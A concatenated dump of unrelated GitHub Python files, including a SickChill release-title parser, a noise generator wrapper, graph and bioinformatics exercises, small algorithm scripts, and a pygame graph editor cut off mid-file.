@staticmethod\n def _processTitle(title, url):\n # Remove 'Mas informacion sobre ' literal from title\n title = title[22:]\n title = re.sub(r\"[ ]{2,}\", \" \", title, flags=re.I)\n\n # Quality - Use re module to avoid case sensitive problems with replace\n title = re.sub(r\"\\[HDTV 1080p?[^\\[]*]\", \"1080p HDTV x264\", title, flags=re.I)\n title = re.sub(r\"\\[HDTV 720p?[^\\[]*]\", \"720p HDTV x264\", title, flags=re.I)\n title = re.sub(r\"\\[ALTA DEFINICION 720p?[^\\[]*]\", \"720p HDTV x264\", title, flags=re.I)\n title = re.sub(r\"\\[HDTV]\", \"HDTV x264\", title, flags=re.I)\n title = re.sub(r\"\\[DVD[^\\[]*]\", \"DVDrip x264\", title, flags=re.I)\n title = re.sub(r\"\\[BluRay 1080p?[^\\[]*]\", \"1080p BluRay x264\", title, flags=re.I)\n title = re.sub(r\"\\[BluRay Rip 1080p?[^\\[]*]\", \"1080p BluRay x264\", title, flags=re.I)\n title = re.sub(r\"\\[BluRay Rip 720p?[^\\[]*]\", \"720p BluRay x264\", title, flags=re.I)\n title = re.sub(r\"\\[BluRay MicroHD[^\\[]*]\", \"1080p BluRay x264\", title, flags=re.I)\n title = re.sub(r\"\\[MicroHD 1080p?[^\\[]*]\", \"1080p BluRay x264\", title, flags=re.I)\n title = re.sub(r\"\\[BLuRay[^\\[]*]\", \"720p BluRay x264\", title, flags=re.I)\n title = re.sub(r\"\\[BRrip[^\\[]*]\", \"720p BluRay x264\", title, flags=re.I)\n title = re.sub(r\"\\[BDrip[^\\[]*]\", \"720p BluRay x264\", title, flags=re.I)\n\n # detect hdtv/bluray by url\n # hdtv 1080p example url: http://www.newpct.com/descargar-seriehd/foo/capitulo-610/hdtv-1080p-ac3-5-1/\n # hdtv 720p example url: http://www.newpct.com/descargar-seriehd/foo/capitulo-26/hdtv-720p-ac3-5-1/\n # hdtv example url: http://www.newpct.com/descargar-serie/foo/capitulo-214/hdtv/\n # bluray compilation example url: http://www.newpct.com/descargar-seriehd/foo/capitulo-11/bluray-1080p/\n title_hdtv = re.search(r\"HDTV\", title, flags=re.I)\n title_720p = re.search(r\"720p\", title, flags=re.I)\n title_1080p = re.search(r\"1080p\", title, flags=re.I)\n title_x264 = re.search(r\"x264\", title, flags=re.I)\n title_bluray = re.search(r\"bluray\", title, flags=re.I)\n title_serie_hd = re.search(r\"descargar-seriehd\", title, flags=re.I)\n url_hdtv = re.search(r\"HDTV\", url, flags=re.I)\n url_720p = re.search(r\"720p\", url, flags=re.I)\n url_1080p = re.search(r\"1080p\", url, flags=re.I)\n url_bluray = re.search(r\"bluray\", url, flags=re.I)\n\n if not title_hdtv and url_hdtv:\n title += \" HDTV\"\n if not title_x264:\n title += \" x264\"\n if not title_bluray and url_bluray:\n title += \" BluRay\"\n if not title_x264:\n title += \" x264\"\n if not title_1080p and url_1080p:\n title += \" 1080p\"\n title_1080p = True\n if not title_720p and url_720p:\n title += \" 720p\"\n title_720p = True\n if not (title_720p or title_1080p) and title_serie_hd:\n title += \" 720p\"\n\n # Language\n title = re.sub(r\"\\[Spanish[^\\[]*]\", \"SPANISH AUDIO\", title, flags=re.I)\n title = re.sub(r\"\\[Castellano[^\\[]*]\", \"SPANISH AUDIO\", title, flags=re.I)\n title = re.sub(r\"\\[Español[^\\[]*]\", \"SPANISH AUDIO\", title, flags=re.I)\n title = re.sub(r\"\\[AC3 5\\.1 Español[^\\[]*]\", \"SPANISH AUDIO\", title, flags=re.I)\n\n if re.search(r\"\\[V.O.[^\\[]*]\", title, flags=re.I):\n title += \"-NEWPCTVO\"\n else:\n title += \"-NEWPCT\"\n\n return title.strip()\n","repo_name":"SickChill/sickchill","sub_path":"sickchill/oldbeard/providers/newpct.py","file_name":"newpct.py","file_ext":"py","file_size_in_byte":9752,"program_lang":"python","lang":"en","doc_type":"code","stars":2371,"dataset":"github-code","pt":"37"} +{"seq_id":"34885196038","text":"from enum import Enum\nfrom math import prod\nimport numpy as np\n\nfrom pyambient.src import cppyy\n\n# _perlin_2d = cppyy.gbl.perlin_2d_c\n# _perlin_3d = cppyy.gbl.perlin_3d_c\n# _simplex_2d = cppyy.gbl.simplex_2d_c\n# _simplex_3d = cppyy.gbl.simplex_3d_c\n# _simplex_4d = cppyy.gbl.simplex_4d_c\n_noise_2d = cppyy.gbl.noise_2d_c\n_noise_3d = cppyy.gbl.noise_3d_c\n\n\nclass NoiseType(Enum):\n open_simplex2 = 0\n open_simplex2S = 1\n cellular = 2\n perlin = 3\n value_cubic = 4\n value = 5\n white = 6\n\n\nclass FractalType(Enum):\n none = 0\n fbm = 1\n ridged = 2\n pingpong = 3\n domain_warp_progressive = 4\n domain_warp_independent = 5\n\n\nclass RotationType3D(Enum):\n none = 0\n improve_xy_planes = 1\n improve_xz_planes = 2\n\n\nclass CellularDistanceFunction(Enum):\n euclidean = 0\n euclidean_square = 1\n manhattan = 2\n hybrid = 3\n\n\nclass CellularReturnType(Enum):\n cell_value = 0\n distance = 1\n distance2 = 2\n distance2_add = 3\n distance2_sub = 4\n distance2_mul = 5\n distance2_div = 6\n\n\nclass DomainWarpType(Enum):\n open_simplex2 = 0\n open_simplex2_reduced = 1\n basic_grid = 2\n\n\ndef generate_noise_arr(dimensions: tuple, noise_type='perlin', frequency: float = 0.01,\n fractal='fbm', octaves: int = 3, lacunarity: int = 2,\n gain: float = 0.5, cellular_distance_fn=-1, cellular_return_type=0,\n domain_warp_type=0, jitter=0,\n perturb=0, domain_warp_amp=1, seed: int = None):\n fractal_type = FractalType[fractal].value\n noise_type = NoiseType[noise_type].value\n common_args = dict(\n noise_type=noise_type,\n seed=np.random.randint(0, 1000) if not seed else seed,\n freq=frequency,\n fractal=fractal_type,\n octaves=octaves,\n lacunarity=lacunarity,\n gain=gain,\n perturb=perturb,\n domain_warp_amp=domain_warp_amp,\n cellular_distance=cellular_distance_fn,\n cellular_return_val=cellular_return_type, jitter=jitter\n )\n if len(dimensions) == 2:\n noise = _noise_2d(\n height=dimensions[0],\n width=dimensions[1],\n **common_args)\n\n elif len(dimensions) == 3:\n noise = _noise_3d(\n height=dimensions[0],\n width=dimensions[1],\n depth=dimensions[2],\n **common_args)\n\n else:\n raise Exception(\"number of dimensions not supported\")\n\n noise_np = np.frombuffer(noise, dtype=np.float32, count=prod(dimensions))\n return noise_np.reshape(dimensions)\n\n","repo_name":"wwymak/pyambient","sub_path":"pyambient/py/noise.py","file_name":"noise.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71637559466","text":"\n\"\"\"Code Challenge: Solve the Eulerian Path Problem.\n Input: The adjacency list of a directed graph that has an Eulerian path.\n Output: An Eulerian path in this graph.\n\"\"\"\n\n#I'm just going to re-use here the function eulerianCycle that I coded before.\ndef eulerianCycle(graph):\n edges = {}\n for i in range (len(graph)):\n edges[i] = len(graph[i])\n cycle = []\n tempCycle = []\n node = 0\n tempCycle.append(0)\n while len(tempCycle):\n if edges[node]:\n tempCycle.append(node)\n nextNode = graph[node][-1]\n edges[node] -= 1\n graph[node].pop()\n node = nextNode\n else:\n cycle.append(node)\n node = tempCycle[-1]\n tempCycle.pop()\n\n eularian = []\n for i in range(len(cycle) - 1, -1, -1):\n eularian.append(cycle[i])\n return eularian\n\n\n#Here is our main function.\ndef eulerianPath(adjacency):\n #First of all, we need to identify the unbalanced nodes.\n outdegree = {}\n indegree = {}\n\n #Let's add the number of edges each by counting the indegree and the outdegree of each node.\n #First, let's add the outdegree in the edges list.\n for i in range (len(adjacency)):\n outdegree[i] = len(adjacency[i])\n print(outdegree)\n\n #For the indegree, lets transform the list of list into a single list of elements\n temporary = []\n for sublist in adjacency:\n for item in sublist:\n temporary.append(item)\n \n print(temporary)\n\n #Now that we have a simple list with just the different nodes that are reached by an edge,\n #we can simply count the occurences of each node in the temporary list. \n #Thanks to that, we will finally have the indegree dico complete\n for i in range (len(temporary)):\n indegree[i] = temporary.count(i)\n \n print(indegree)\n\n #This is now awesome, we have all our degrees calculated. We now need to compare these two\n #dictionnarys to find the nodes that are unbalanced. After that, we'll create a connection between those two.\n problematicNodes = [node for node in outdegree if node in indegree and outdegree[node] != indegree[node]]\n print(\"Here are our two problematic values\")\n print(problematicNodes)\n\n #The principle will now to connect those two nodes to make an eulerian cycle\n for node in problematicNodes:\n print(node)\n print(outdegree[node])\n print(indegree[node])\n if outdegree[node] < indegree[node]:\n outdegree[node] = outdegree[node] + 1\n else:\n indegree[node] = indegree[node] + 1\n \n print(node)\n #+We have of course to modify the adjacency itself. \n if node == problematicNodes[0]:\n adjacency[problematicNodes[0]].append(problematicNodes[1])\n \n \n print(\"Here is the eulerian cycle with the indegree and outdegree that are similar\")\n print(indegree)\n print(outdegree)\n print(adjacency)\n\n #Now, we can finally calculate an eulerian cycle with the function I coded before\n cycle = eulerianCycle(adjacency)\n print(cycle)\n \n #Finally, we simply need to put them in the right order to be a path and not a cycle\n #For that, we need to cut in the right place\n answer = []\n for i in range (len(cycle)):\n if cycle[i] == problematicNodes[1] and cycle[i - 1] == problematicNodes[0]:\n answer.append(cycle[i])\n for i in range(cycle[problematicNodes[1]] - 1, len(cycle)):\n answer.append(cycle[i])\n \n for i in range(1, cycle[problematicNodes[0]] + 1):\n answer.append(cycle[i])\n \n #Let's print the final answer\n for i in range (len(answer)):\n print(answer[i], end = \"\")\n print(\" -> \", end = \"\")\n return answer\n \n\n\n#Random test\n#print(eulerianPath([[2], [3], [1], [0, 4], [], [], [3, 7], [8], [9], [6]]))\nprint(eulerianPath([[5], [6], [1], [4], [0], [2], []]))","repo_name":"carbonnm/MOOC-Bioinformatics","sub_path":"code/Week2/eulerianPathProblem.py","file_name":"eulerianPathProblem.py","file_ext":"py","file_size_in_byte":3918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5561554297","text":"def sym_2_arrays(arg1, arg2):\n unique = set(arg1 + arg2)\n result = []\n for check in unique:\n if ((check in arg1) and (check in arg2)):\n continue\n else: result.append(check)\n return result\n\ndef sym(*arg):\n result = sym_2_arrays(arg[0], arg[1])\n for i in range(2, len(arg)):\n result = sym_2_arrays(result, arg[i])\n print(result)\n\nsym([3, 3, 3, 2, 5], [2, 1, 5, 7], [3, 4, 6, 6], [1, 2, 3], [5, 3, 9, 8], [1])","repo_name":"themeowsketeer/Python-Playground","sub_path":"interview_questions/SymmetricDifference.py","file_name":"SymmetricDifference.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14935340970","text":"# 미로탐색\nfrom collections import deque\n\ndef bfs(x, y):\n #상 우 하 좌\n dx = [-1, 0, 1, 0]\n dy = [0, 1, 0, -1]\n \n queue = deque()\n queue.append((x, y))\n \n while(queue):\n x, y = queue.popleft()\n \n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n # 배열의 범위를 넘어가는 경우\n if nx < 0 or nx >= n or ny < 0 or ny >= m :\n continue\n # 이동할 수 없는 칸인 경우\n elif graph[nx][ny] == 0:\n continue\n # 이동할 수 있는 칸인 경우\n if graph[nx][ny] == 1:\n # graph[nx][ny] = 0\n graph[nx][ny] = graph[x][y] + 1\n queue.append((nx,ny))\n return graph[n-1][m-1]\n\nn, m = map(int, input().split())\ngraph =[]\n\nfor i in range(n):\n graph.append(list(map(int, input())))\n\nprint(bfs(0,0))\n ","repo_name":"tjrdnjs67/Algorithm_Study","sub_path":"hyeonji/2178.py","file_name":"2178.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9577858796","text":"import argparse\n\nFILENAME = 'bakery.csv'\nENCODING = 'utf-8'\n\nparser = argparse.ArgumentParser()\nparser.add_argument('sum', type=str, help='Sum')\nargs = parser.parse_args()\n\nwith open(FILENAME, 'a', encoding=ENCODING) as f:\n f.write(args.sum + '\\n')\n","repo_name":"demade74/de_course","sub_path":"q1/python/Kulushev_Konstantin_dz_6/task_7/add_sale.py","file_name":"add_sale.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11072148482","text":"def ProfileMostProbablePattern(Text, k, Profile):\n # insert your code here. Make sure to use Pr(Text, Profile) as a subroutine!\n\tmatchmax=-1\n\tProbablePattern=\"\"\n\tfor i in range(len(Text)-k+1):\n\t\tPattern = Text[i:i+k]\n\t\tif Pr(Pattern, Profile) > matchmax:\n\t\t\tmatchmax=Pr(Pattern, Profile)\n\t\t\tProbablePattern=Pattern \n \n\treturn ProbablePattern\n\n\ndef score(motifs):\n '''Returns the score of the given list of motifs.'''\n columns = [''.join(seq) for seq in zip(*motifs)]\n max_count = sum([max([c.count(nucleotide) for nucleotide in 'ACGT']) for c in columns])\n return len(motifs[0])*len(motifs) - max_count\n\n\ndef profile(motifs):\n '''Returns the profile of the dna list motifs.'''\n columns = [''.join(seq) for seq in zip(*motifs)]\n return [[float(col.count(nuc)) / float(len(col)) for nuc in 'ACGT'] for col in columns]\n\n\ndef greedy_motif_search(dna_list, k, t):\n '''Runs the Greedy Motif Search algorithm and retuns the best motif.'''\n # Initialize the best score as a score higher than the highest possible score.\n best_score = t*k\n\n # Run the greedy motif search.\n for i in range(len(dna_list[0])-k+1):\n # Initialize the motifs as each k-mer from the first dna sequence.\n motifs = [dna_list[0][i:i+k]]\n\n # Find the most probable k-mer in the next string.\n for j in range(1, t):\n current_profile = profile(motifs)\n motifs.append(profile_most_probable_kmer(dna_list[j], k, current_profile))\n\n # Check to see if we have a new best scoring list of motifs.\n current_score = score(motifs)\n if current_score < best_score:\n best_score = current_score\n best_motifs = motifs\n\n return best_motifs\n\n\ndef main():\n '''Main call. Reads, runs, and saves problem specific data.'''\n # Read the input data.\n with open('dataset.txt') as input_data:\n k, t = map(int, input_data.readline().split())\n dna_list = [line.strip() for line in input_data]\n\n # Run the Greedy Motif Search.\n best_motifs = greedy_motif_search(dna_list, k, t)\n for word in best_motifs:\n print (word)\n \n\n # Print and save the answer.\n #print (best_motifs)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"mars1198/bioinformatics","sub_path":"greedy_motif_search.py","file_name":"greedy_motif_search.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"4368170927","text":"from typing import List\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n def permute(self, nums: List[int]) -> List[List[int]]:\n\n def backTracking(nums: List[int], res: List[List[int]], path: List[int], used: List[bool]):\n if len(path) == len(nums):\n res.append(list(path))\n return\n for i in range(len(nums)):\n if used[i]:\n continue\n used[i] = True\n path.append(nums[i])\n backTracking(nums, res, path, used)\n path.pop()\n used[i] = False\n\n used = [False] * len(nums)\n res = []\n backTracking(nums, res, [], used)\n return res\n\n\n# leetcode submit region end(Prohibit modification and deletion)\ns = Solution()\nprint(s.permute([1, 2, 3]))\n","repo_name":"Howloong/Leetcode","sub_path":"python/leetcode/editor/cn/P46_Permutations.py","file_name":"P46_Permutations.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"98831577","text":"\"\"\"\nЧЕМ ТЕСТЫ ОТЛИЧАЮТСЯ ОТ КОДА, НАПИСАННОГО НА ПАЙТОН?\nТЕСТ ТАКОЙ ЖЕ КОД КОТОРЫЙ ОПИСЫВАЕТ ПОСЛЕДОВАТЕЛЬНОСТЬ ДЕЙСТВИЙ\nНО В ТЕСТАХ ДОЛЖНЫ БЫТЬ ПРОВЕРКИ СРАВНЕНИЯ ОЖИДАЕМОГО РЕЗУЛЬТАТА\nС ДЕЙСТВИТЕЛЬНЫМ РЕЗУЛЬТАТОМ\n\"\"\"\n\n\nclass TestExample:\n def test_check_math(self):\n d = 5\n b = 9\n expected_some = 14\n assert d + b == expected_some, f\"Some of variables are {d} plus {b} not equal {expected_some}\"\n\n def test_check_math2(self):\n d = 5\n b = 3\n expected_some = 14\n assert d + b == expected_some, f\"Some of variables are {d} plus {b} not equal {expected_some}\"\n\n\n\n","repo_name":"shnopiqa/AutotestAPI","sub_path":"pytest+API/test_First_pytest.py","file_name":"test_First_pytest.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"ru","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"36774797204","text":"def run():\n print('class 11: high order functions (part 2)')\n\n # de una lista de numeros, imprimir los numeros impares, usando 'list comprehensions'\n my_list = [1, 4, 5, 6, 9, 13, 19, 21]\n odd = [i for i in my_list if i % 2 != 0]\n print(odd)\n\n # de una lista de numeros, imprimir los numeros impares, usando la función \"filter\"\n # filter(function, iterable)\n odd2 = list(filter(lambda x: x % 2 != 0, my_list))\n print(odd2)\n\nif __name__ == '__main__':\n run()\n","repo_name":"luis2ra/py3-03-platzi-curso-intermedio","sub_path":"11_high_order_functions_part2.py","file_name":"11_high_order_functions_part2.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40407359850","text":"from basekit_core_lib.api.services.base_service import BaseService\nfrom basekit_api_template.api.blog.models.post import Post\nfrom basekit_api_template.api.blog.schemas import PostSchema\nfrom basekit_core_lib.config.helpers import db\n\nclass PostService(BaseService):\n def __init__(self) -> None:\n super().__init__(Post, PostSchema())\n \n def get_all(self):\n try:\n models = self._get_all() \n model_data = self.model_schema.dump(models, many=True)\n return model_data\n except Exception as e:\n db.session.rollback() # Executa o rollback para reverter a transação\n raise Exception(f\"Erro ao obter todas os aplicações: {e}\")\n\n def get_by_id(self, id):\n try:\n model = self._get_by_id(id)\n if model:\n model_data = self.model_schema.dump(model)\n return model_data\n return None\n except Exception as e:\n db.session.rollback() # Executa o rollback para reverter a transação\n raise Exception(f\"Erro ao obter post por ID {id}: {e}\")\n \n def create(self, model_data):\n try:\n self.is_valid(self.model_schema, model_data) # Valida o schema antes de criar o post\n \n model_data.pop('roles', []) # Extrai as informações de ações\n model = self._create(model_data)\n model_data = self.model_schema.dump(model)\n return model_data\n except Exception as e:\n db.session.rollback() # Executa o rollback para reverter a transação\n raise Exception(f\"Erro ao criar aplicações: {e}\")\n \n def update(self, id, model_data):\n try: \n model_data.pop('roles', []) # Extrai as informações de ações \n self.is_valid(self.model_schema, model_data) # Valida o schema antes de atualizar o post\n model = Post.query.get(id)\n if model:\n self._update(model, model_data, self.model_schema)\n model_data = self.model_schema.dump(model)\n return model_data\n return None\n except Exception as e:\n db.session.rollback() # Executa o rollback para reverter a transação\n raise Exception(f\"Erro ao atualizar post com ID {id}: {e}\")\n\n def delete(self, id):\n try:\n return self._delete(id)\n except Exception as e:\n db.session.rollback() # Executa o rollback para reverter a transação\n raise Exception(f\"Erro ao excluir post com ID {id}: {e}\")\n \n","repo_name":"marcorsouza/basekit-api-template","sub_path":"basekit_api_template/api/blog/services/post_service.py","file_name":"post_service.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40021810220","text":"\npriceadult=200\npricechild=100\n\nprint('成人票价为:',priceadult,'小孩票价为:',pricechild)\nadult=int(input('成人人数'))\nchild=int(input('小孩人数'))\ntotal=adult*priceadult + child*pricechild\n'''\nif total>0 and total<200:\n discount=1\nelse:\n if total>=200 and total<500:\n discount=0.95\n else:\n if total>=500 and total<1000:\n discount=0.9\n else:\n discount=0.8\n'''\nif total>0 and total<200:\n discount=1\nelif total>=200 and total<500:\n discount=0.95\nelif total>=500 and total<1000:\n discount=0.9\nelse:\n discount=0.8\n\nprint('原付:%d,应付:%.2f' % (total,total*discount))\n","repo_name":"zhangzhonghua1999/webapp","sub_path":"hua/myproject/weixistyle/5.1 条件语句.py","file_name":"5.1 条件语句.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71609080106","text":"import subprocess\nfrom config import STEPS\nfrom execute_steps import run_steps\n\nSEPERATE_LINE = \"=\" * 55\n\n\ndef main():\n # Start \n print(\"Available step names:\")\n for name in STEPS:\n print(name)\n print(SEPERATE_LINE)\n print(\"Just press enter if you run all steps.\")\n print(SEPERATE_LINE)\n\n # Set steps\n step_input = input(\"Enter the step names to execute (comma-separated): \")\n print(SEPERATE_LINE)\n if not step_input:\n step_names = STEPS\n else:\n step_names = [step.strip() for step in step_input.split(\",\")]\n print(\"Selected steps to execute:\")\n for name in step_names:\n print(name)\n\n # Run stepss\n subprocess.run([\"python\", \"execute_steps.py\"] + step_names)\n run_steps(step_names)\n\n # Finish\n print(\"Process Done.\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dsdanielpark/open-llm-leaderboard-report","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"37"} +{"seq_id":"13675761760","text":"import random\nfrom collections import deque\n\nl = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\nl = deque(l)\n\nfor i in range(int(random.random() * 10000000 // 1000)):\n r = random.randint(1, 3)\n if r == 1:\n l.appendleft(l.pop())\n if r == 2:\n l.append(l.popleft())\n if r == 3:\n l.reverse()\n print(r, l)","repo_name":"kaki1013/AtCoder","sub_path":"AtCoder Regular Contest/132/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30988421529","text":"def is_prime(n):\r\n if n == 2 or n == 3:\r\n return True\r\n\r\n if n <= 1 or n % 2 == 0:\r\n return False\r\n\r\n for i in range(3, n, 2):\r\n if n % i == 0:\r\n return False\r\n return True\r\n\r\n\r\nwith open('liczby.txt', 'r') as file:\r\n for line in file:\r\n liczba = int(line.strip())\r\n odbicie = int(line.strip()[::-1])\r\n\r\n if is_prime(liczba) and is_prime(odbicie):\r\n print(liczba)\r\n","repo_name":"igorjakus/matura2023-informatyka","sub_path":"2022-czerwiec/4_3.py","file_name":"4_3.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22706309644","text":"import arff\nimport os\nimport numpy as np\nfrom argparse import ArgumentParser\n\n\nif __name__ == \"__main__\":\n print(\"Ex6 Q1\\nSyed Mohsin Ali\\n\")\n parser = ArgumentParser()\n parser.add_argument(\"-a\", \"--algoruns\", dest=\"scenario\",\n default=\"SAT11-INDU/algorithm_runs.arff\", help=\"specify algorithm_runs.arff file\")\n args, unknown = parser.parse_known_args()\n\n np.set_printoptions(formatter={\"float\": lambda x: \"%0.0f\" % x})\n scenarios = [\"SAT11-INDU\", \"SAT11-RAND\"]\n set = 1\n # scenario = scenarios[set]\n scenario = args.scenario\n print(\"DataSet:%s\\n\" % scenario)\n\n ar = args.scenario\n # print(ar, cv, fv)\n results = arff.load(open(ar, \"rb\"))\n data = results[\"data\"]\n\n num_algos = 0\n algos = list()\n for i, d in enumerate(data):\n # print(\"here:\", i)\n if data[i][2] not in algos:\n algos.append(data[i][2])\n else:\n break\n\n num_algos = len(algos)\n num_instances = len(data) / num_algos\n\n runtime_matrix = np.zeros((num_instances, num_algos))\n\n for i in range(num_instances):\n for j in range(num_algos):\n if data[i * num_algos + j][3] == 5000:\n runtime_matrix[i][j] = data[i * num_algos + j][3] * 10\n else:\n runtime_matrix[i][j] = data[i * num_algos + j][3]\n\n oracle_time = np.zeros(num_instances)\n oracle_time = np.amin(runtime_matrix, axis=1)\n ot = np.average(oracle_time)\n\n seq_time = np.zeros(num_instances)\n seq_time = np.amin(runtime_matrix, axis=1) * num_algos\n np.clip(seq_time, 0, 50000, seq_time)\n st = np.average(seq_time)\n\n single_best = np.zeros(num_algos)\n single_best = np.average(runtime_matrix, axis=0)\n sbt = np.amin(single_best)\n # print(single_best)\n\n print(\"Oracle:\", ot)\n print(\"SB:\", sbt)\n # print(\"Seq. Time:\", st)\n # np.savetxt(\"matrix.txt\", runtime_matrix, fmt='%.2f')\n\n","repo_name":"smohsinali/aad","sub_path":"ex6/aslib_state.py","file_name":"aslib_state.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38409257349","text":"def main():\n actNum = int(input(\"Enter number 5-digit integer number: \"))\n \n if (actNum >= 10000 and actNum <= 99999):\n checkDigit = actNum % 10\n accNum = actNum // 10\n num1 = (accNum // 1000)\n num2 = (accNum // 100) % 10\n num3 = (accNum // 10) % 10\n num4 = (accNum % 10)\n \n total = num1 + num2 + num3 + num4\n\n valid = (total % 7) == checkDigit\n if valid:\n print(\"Valid!\")\n else:\n print(\"Invalid\")\n\nmain()\n","repo_name":"kevanantha/campus-python","sub_path":"pythonuts.py","file_name":"pythonuts.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37198646993","text":"import pygame, sys\n\nfrom pygame.draw import line\nfrom Node import Node\nfrom Edge import Edge\nfrom fringe import PriorityQueue\nfrom TextBox import TextBox\n\n\nclass Graph:\n def __init__(self, surface, screen, radius, directed = False):\n self.surface = surface\n self.screen = screen\n self.radius = radius\n self.margin = radius * 2 - 5 #> Outside the node\n self.padding = radius - 5 #> Inside the node\n self.nodes = []\n self.edge = []\n self.edges = []\n self.directed = directed\n self.font = pygame.font.Font(\"RobotoCondensed-Regular.ttf\", 20)\n self.adding = False\n self.showHeuristic = False\n self.showCost = False\n self.node_sound = pygame.mixer.Sound(\"sound.wav\")\n self.node_sound.set_volume(0.1)\n self.edge_sound= pygame.mixer.Sound(\"mouse_click.wav\")\n self.edge_sound.set_volume(0.1)\n\n\n def addNode(self, point):\n\n for node in self.nodes:\n if (node.insideNode(point, self.margin)):\n return False \n\n self.nodes.append(Node(point, radius= self.radius))\n self.node_sound.play()\n self.adding = True\n return True\n\n\n def removeNode(self, point):\n for nodeA in self.nodes:\n if (nodeA.insideNode(point, self.padding)):\n for nodeB in self.nodes:\n nodeB.removeConnection(nodeA)\n nodeB.color = Node.default_color\n self.nodes.remove(nodeA)\n self.edge = []\n self.deleteEdge(nodeA)\n return\n\n\n def addEdge(self, point):\n if (self.adding):\n self.adding = False\n else:\n for node in self.nodes:\n if (node.insideNode(point, self.padding)):\n\n if (node in self.edge):\n self.edge = []\n node.color = Node.default_color\n else:\n self.edge.append(node)\n self.edge_sound.play()\n\n if len(self.edge) == 2:\n if (Edge(self.edge[0], self.edge[1]) not in self.edges):\n edge = Edge(self.edge[0], self.edge[1], self.directed,self.surface, self.screen)\n self.edges.append(edge)\n self.edge[0].addConnection(node, edge)\n if not(self.directed):\n self.edge[1].addConnection(self.edge[0], edge)\n \n self.edge[0].color = Node.default_color\n\n\n self.edge = []\n\n\n def deleteEdge(self, node):\n deleteIndex = []\n for index, edge in enumerate(self.edges):\n if node.center == edge.startingPoint or node.center == edge.endingPoint:\n deleteIndex.append(index)\n \n for i in deleteIndex[::-1]:\n self.edges.pop(i)\n\n\n def draw_nodes(self, point):\n\n for state,node in enumerate(self.nodes):\n\n if (node.type == \"G\"):\n node.state = \"G\"\n else:\n node.state = \"S\" + str(state)\n\n\n pygame.draw.circle(self.surface, (48, 48, 48), (node.center.x + 2, node.center.y + 2), node.radius) #> Shadow\n \n if (node in self.edge): #> Selected\n node.color = Node.selected_color\n \n pygame.draw.circle(self.surface, node.color, node.center, node.radius) #> Node fill\n \n node.draw_state(self.font, self.surface)\n\n if (self.showHeuristic):\n node.tb.render(self.surface, self.font)\n\n if (node.insideNode(point, self.padding)): #> Hovering over node\n # node.color = node.hovered_color\n pygame.draw.circle(self.surface, Node.hovered_color, node.center, node.radius, 4) #> Node fill\n else:\n pygame.draw.circle(self.surface, (0,0,0), node.center, node.radius, 3) #> Node border\n \n\n def draw_edges(self):\n for edge in self.edges:\n edge.draw(self.surface, edge.color, (0,255,0))\n if (self.showCost):\n edge.tb.render(self.surface, self.font)\n \n\n def addWeight(self, point):\n if (self.showHeuristic or self.showCost):\n for node in self.nodes:\n if(self.showHeuristic):\n if (node.tb.rect.collidepoint(point)):\n node.heuristic = node.tb.takeInput(self.surface, self.screen, self.font)\n return True\n \n if (self.showCost):\n for adj in node.adjacent:\n if(adj[1].tb.rect.collidepoint(point)):\n adj[1].weight = adj[1].tb.takeInput(self.surface, self.screen, self.font)\n return True\n\n\n def isEmpty(self):\n return True if len(self.edges) == 0 else False\n\n\n def reset(self):\n self.nodes = []\n self.edges = []\n self.edge = []\n self.reset_nodes()\n\n\n def printGraph(self):\n for node in self.nodes:\n print(node)\n\n\n def path_to_goal(self, current):\n cost = 0\n while(current.parent is not None):\n edge = current.getEdgeFromParent()\n cost += edge.weight\n edge.color = (76, 82, 245)\n current = current.parent\n return cost\n\n \n def start_goal_states(self, point):\n for node in self.nodes:\n if(node.insideNode(point, self.padding)):\n return node\n\n\n def input_depth_limit(self, point):\n prompt = \"Please type the maximum depth.\"\n prompt_surf = self.font.render(prompt, True, (0,0,0))\n prompt_rect = prompt_surf.get_rect()\n prompt_rect.center = self.surface.get_width() // 2, self.surface.get_height() // 2 - 20\n\n box = pygame.Rect(0, 0, prompt_rect.width + 30, prompt_rect.height + 50)\n box.center = (self.surface.get_width() // 2, self.surface.get_height() // 2)\n\n tb = 